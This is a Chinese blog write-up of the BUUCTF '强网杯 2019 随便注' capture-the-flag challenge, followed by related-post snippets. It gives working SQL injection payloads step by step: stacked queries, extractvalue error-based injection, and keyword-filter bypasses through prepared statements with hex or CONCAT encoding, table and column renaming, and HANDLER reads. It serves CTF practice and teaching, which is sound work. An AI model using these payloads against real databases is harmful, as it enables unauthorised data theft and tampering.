BUUCTF-WEB:[强网杯 2019]随便注 1

最新推荐文章于 2024-04-07 15:17:11 发布
最新推荐文章于 2024-04-07 15:17:11 发布
阅读量955 收藏 21
点赞数 7
分类专栏: # CTF&Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/113098593
版权

题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn

打开环境:

尝试注入:

解题思路:
1、先尝试用union联合注入:
第一步、测试注入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型

1'                             [error]
1'#                           [不报错,正常回显]
1' and 1=1#             [不报错,正常回显]
1' or 1=1#                [不报错,正常回显]
初步判定存在SQL注入

第二步、利用order by查表的列数

1' order by 1#        [不报错,正常回显]
1' order by 2#        [不报错,正常回显]
1' order by 3#        [error 1054 : Unknown column '3' in 'order clause']

得知这张表有三列

第三步、如有回显,找到回显位(回显,就是显示正在执行的批处理命令及执行的结果等)

1' union select 1,2#      [return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);]-----回显了过滤的关键字(/i表示对大小写不敏感)

2、不能找到回显位,接下来尝试使用堆叠注入就是通过 ;分号注入多条SQL语句

①通过show databases爆出数据库:1';show databases;#(执行结果如下图)

②用 show tables 尝试爆表:1';show tables;#(发现有words和1919810931114514这两张表)

③可以看到这里有两个表,我们先尝试爆words表中的内容:1'; show columns from words; #

然后爆表 1919810931114514 中的内容:1'; show columns from `1919810931114514`; #  
注意:表名为数字时,要用反引号包起来查询(反引号为英文状态下的Tab上面那个键)

以上步骤可以发现爆出来了flag字段,然而我对于flag毫无办法:

这里过滤了select,也没有发现绕过select的地方(大小写,加注释)。
于是可以考虑一下报错注入,这里限制了update,那么就不用updatexml,用extractvalue

用户名
1' and (extractvalue(1,concat(0x7e,user(),0x7e)));#
error 1105 : XPATH syntax error: '~root@localhost~'

数据库

1' and (extractvalue(1,concat(0x7e,database(),0x7e)));#
error 1105 : XPATH syntax error: '~supersqli~'

版本
1' and (extractvalue(1,concat(0x7e,version(),0x7e)));#
error 1105 : XPATH syntax error: '~10.3.15-MariaDB~'

到这里可以查出简单的信息,但是过滤了select,似乎无法进一步查表查列了。

可以看到1919810931114514表中有我们想要的flag字段,现在常规方法基本就结束了,要想获得flag就必须来点骚姿势了
借鉴一下大佬们的wp:大佬A大佬B

绕过SELECT解题思路1:SQL预编译

上一步我们可以得知flag存在于1919810931114514表的flag字段
接下来要读取此字段内的数据,我们要执行的目标语句是:select * from `1919810931114514`;但是由上面步骤可知过滤了select关键字
这里需要绕过select的限制,我们可以使用SQL预编译的方式:

预编译相关语法如下:
set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句

直接上payload就懂了:

-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下
-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#


这里检测到了set和prepare关键词,但strstr这个函数并不能区分大小写,我们将其大写即可。
payload改为:

-1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');PRepare stmt from @sql;EXECUTE stmt;#

获得FLAG:

flag{916339c0-aa58-4f9e-827f-6489a2d3ff44}

或者:

因为select被过滤了,所以先将select * from ` 1919810931114514 `进行16进制编码

再通过构造payload得

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

  • prepare…from…是预处理语句,会进行编码转换。
  • execute用来执行由SQLPrepare创建的SQL语句。
  • SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。



绕过SELECT解题思路2:更改表名列名
 虽然有强大的正则过滤,但没有过滤alert和rename关键字

由上面的探测我们可以猜测出这里会查询出words表的data列的结果。也就是类似于下面的sql语句:

select * from words where id = '';

反想一下,我们如果将表1919810931114514名字改为words,flag列名字改为id,那么我们就能得到flag的内容了!
修改表名和列名的语法如下:

-- 修改表名 
rename table old_table to new_table;
-- 或者
alter table old_table rename to new_table;

-- 修改列名称
alter table table_name change column old_name new_name varchar(255);

-- 修改字段类型
alter table table_name modify column column_name varchar(255) default '' COMMENT '注释';

最终payload如下:先将原来的表words改为words1,将表1919810931114514名字改为words,flag列名字改为id

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#

然后使用1' or 1=1#即可查询出flag(相当于二次注入)

 

绕过SELECT解题思路3:handler语句代替select查询
类似题型:[2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

语法结构:

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE
如:通过handler语句查询users表的内容
handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄

本题payload如下:

1'; handler `1919810931114514` open as `a`; handler `a` read next;#

 

 

Wαff1ε
关注
  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[强网杯 2019]随便1
m0_75178803的博客
11-05 209
打开题目输入1输入1',页面报错,输入1' #页面正常说明1为入点且入方式为字符型的单引号入判断列名输入1' order by 2 # 页面正常1' order by 3 #页面报错说明列名字段数为2接下来我们尝试用联合入的方式爆出数据显示位输入1' union select 1,2 #可以看到过滤了很多东西说明我们用不了联合入,因为过滤了union我们尝试堆叠入来查看有多少个数据库1';我们查看表名1';可以看到当前数据库下有两个表1';
buuctf [强网杯 2019]随便 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
buuctf web题解之[强网杯 2019]随便1详解,网络安全开发了解这些自然无惧面试
m0_60666841的博客
04-07 263
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 262
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
[强网杯 2019]随便 1(SQL堆叠入+修改数据库+预处理语句+concat拼接)
Home to come
08-17 934
本文属于个人刷题记录,不会完全描述步骤,而是写自己感触深的知识点。 1.堆叠入原理(stacked injection)   在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。 1.1与union查询区别   而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
最新发布
05-06
写题记录
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
[强网杯 2019]随便
m0_56691564的博客
11-30 2639
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF刷题记录】[强网杯 2019]随便
m0_60911102的博客
09-17 358
随便
BUUCTF web-[强网杯 2019]随便
m0_53314778的博客
01-15 803
按流程走,首先初步判定是否存在sql入(肯定存在了,我们假装判定一下) 输入 1’ or 1=1 #,得到 我们再依次尝试输入 1’ order by 1# 1’ order by 2# 1’ order by 3# 测字段数 到3 报错,字段数为2 尝试联合入union,看能否查出字段 select被过滤,不能查。我们接着爆表 显示有两个表,为word 和 1919810931114514,表位数字串要记得加单引号`` 我们试着爆出两个表的内容 1’; show columns from wo
BUUCTF-web-随便
nareku的博客
07-06 1159
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
强网杯2019-web-随便
wyj_1216 House
02-05 1952
题目 writeup 首先根据题目意思,知道是SQL入 尝试进行入 ?inject=1 1' 发现报错,想到利用#进行截断(释掉) 1' # 回显正常 1' and 1=1# 1' and 1=2# 发现没有回显 判断字段数 1' order by 1# 1' order by 2# 1' order by 3# 到3时报错,故知字段数为2 尝试union联...
强网杯2019 随便
BlueDoorZz的博客
07-11 376
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
[强网杯2019]随便(初学者看过来)
xiaobu30的博客
11-15 5068
这是一道web方向的sql入的题目,通过借鉴各位大佬的博客,我给大家分享我学到的几种方法。 查询 “1” 的时候,会有回显 使用单引号闭合,尝试 “1' and 1 = 2#” (可以将这个理解为万能密码,#会将后面的语句释掉) , 发现无回显 仅使用单引号入发现会报sql语法错误 第一种: ...
春秋云境 任意文件上传
09-09
春秋云境是一个虚构的概念,可能在上下文中用于描述一个虚拟环境或者某种技术。根据所提供的引用内容,引用提到了一个叫做"WBCE CMS v1.5.2"的软件存在文件上传漏洞,攻击者可以利用这个漏洞进行远程命令执行(RCE)。 这意味着攻击者可以上传任意文件到目标网站的服务器上,并在服务器上执行任意命令。然而,我并不鼓励或支持任何非法活动或攻击行为。如果你对网站安全感兴趣,建议你学习和了解有关网络安全的相关知识,并按法律和道德规范行事。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值